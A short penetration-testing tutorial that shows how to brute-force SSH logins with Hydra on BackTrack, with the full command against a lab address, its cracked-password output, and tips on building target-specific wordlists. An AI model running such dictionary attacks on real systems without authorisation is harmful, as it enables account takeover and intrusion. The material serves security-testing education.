For this example we will use BackTrack, you can download the ISO image from here. You will need to boot the ISO in a virtual machine and Hydra is ready to use with a lot of tools. Click in the shell and type hydra.
Attacking a server with SSH service
Wordlist: The one that it is coming from BackTrack 5 R3 located: /pentest/passwords/wordlists/darkc0de.lst
hydra -l aadams -P /pentest/passwords/wordlists/darkc0de.lst -f 192.168.3.10 ssh
- -l login or username
- -P Password wordlist
- -f exit when a login/pass pair is found
[ssh] host: 192.168.3.10 login: aadams password: nostradamus
Tips when you run a dictionary attack
- It is better to use custom list according to the username we try to use like hobbies, field, industries, etc. For example it is a high probability that somebody who likes a lot animals use any password including animals, artist, etc, etc.
- Patience, run a big list with 1 Million possible passwords takes time.
- Try no to run extreme attack again the service, this could crash the service and you will miss time and the company where you are testing the security will be mad with you.